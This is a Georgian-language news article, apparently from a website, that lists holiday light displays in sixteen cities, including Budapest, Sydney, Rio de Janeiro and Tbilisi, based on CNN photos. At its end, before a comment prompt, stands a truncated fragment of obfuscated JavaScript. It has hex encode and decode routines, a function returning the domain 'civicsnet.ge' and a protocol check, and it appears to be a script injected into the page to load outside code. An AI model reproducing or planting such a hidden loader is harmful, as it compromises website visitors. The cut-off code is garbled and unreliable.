მსოფლიოს საშობაო განათებები

25 დეკემბერს ქრისტიანების ნაწილი შობის დღესასწაულს აღნიშნავს. ტელეკომპანია CNN-მა ოფიციალურ ვებ-გვერდზე გამოაქვეყნა სურათები, სადაც ნაჩვენებია, თუ როგორაა განათებული შობა-ახალი წლის დღესასწაულებზე მსოფლიოს სხვადასხვა ქალაქები. მათ შორის თბილისიც მოხვდა.

  1. ბუდაპეშტი, უნგრეთი. წმინდა სტეფანეს ბაზილიკა უნგრეთის დედაქალაქის უდიდესი ეკლესიაა.

  1. მონაკო. მოელით, რომ მონტე-კარლოს კაზინო მონაკოში საშობაოდ იქნება განათებული? თქვენ იმედი არ გაგიცრუვდებათ.

  1. სიდნეი, ავსტრალია. წმინდა მარიამის საკათედრო ტაძარი საშობაოდ პროექტორის საშუალებით გაანათეს.

  1. ლონდონი. დიდი ბრიტანეთის დედაქალაქში, ოქსფორდის ქუჩაზე ავტობუსით გასეირნებაც კი საშობაო განწყობაზე დაგაყენებთ.

  1. გოტემბა, იაპონია. ფუძიამას მთასთან, საკურორტო ქალაქ გოტემბაში, ყოველწლიურად ლაით შოუ იმართება. წლევანდელი განათება 21 მარტამდე გასტანს.

  1. ნიცა, საფრანგეთი. ფრანგულ რივიერაზე, ქალაქ ნიცაში სეირნობისას სანტა კლაუსს ნახავთ.

  1. ნიუ იორკი, აშშ. როკფელერის ცენტრის სახელმგანთქმული ნაძვის ხის 83-ე ვერსია 2 დეკემბერს განათდა.

  1. რიო-დე-ჟანიერო, ბრაზილია. რიოს ყველაზე ცნობილი სიმბოლო – ქრისტეს ქანდაკება ცნობილმა დიზაინერმა გასპარე დი კარომ გაანათა.

  1. ბარნჰემ-ონ-სი, დიდი ბრიტანეთი. ქალაქი 5 იანვრამდე ათასობით საახალწლო ნათურით იქნება განათებული.

  1. სინგაპური. სინგაპურის ბაღის განათებული სკულპტურა სადღესასწაულო დღეებში მნახველებს განსაკუთრებულ სანახაობას სთავაზობს.

  1. ბერლინი, გერმანია. სადღესასწაულო დღეებში ბერლინის დიდი სავაჭრო ცენტრები ცნობისმოყვარეთა ინტერესს დააკმაყოფილებს.

  1. ამრისტარი, ინდოეთი. მიუხედავად იმისა, რომ ინდოეთი უმეტესად ინდუისტური ქვეყანაა, შობის დღესასწაული მაინც აღინიშნება. წმინდა მარიამის კათოლიკური ეკლესია საშობაოდაა განათებული.

  1. ჟენევა, შვეიცარია. ჟენევაში განათების ფესტივალი იმართება, რომელიც ქალაქის ცენტრსა და ტბის მიმდებარე ტერიტორიაზე სადღესასწაულო ატმოსფეროს ქმნის.

  1. თბილისი, საქართველო. სადღესასწაულო განათება საქართველოს დედაქალაქში პიკის საათს გაცილებით საინტერესოს ხდის.

  1. ბრუკლინი, ნიუ იორკი. დიკერ ჰაითსი აშშ-ის ეთნიკურად ყველაზე მრავალფეროვანი რაიონია. აქ საშობაოდ სახლები ერთმნანეთისგან განსხვავებულად ნათდება, რაც ბევრ ადამიანს იზიდავს.

  1. ოკლანდი, ახალი ზელანდია. ფრანკლინ როუდზე საცხოვრებელი სახლების განათების ტრადიცია ოკლენდში უკვე 20 წელზე მეტია რაც არსებობს.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "civicsnet.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Leave a Reply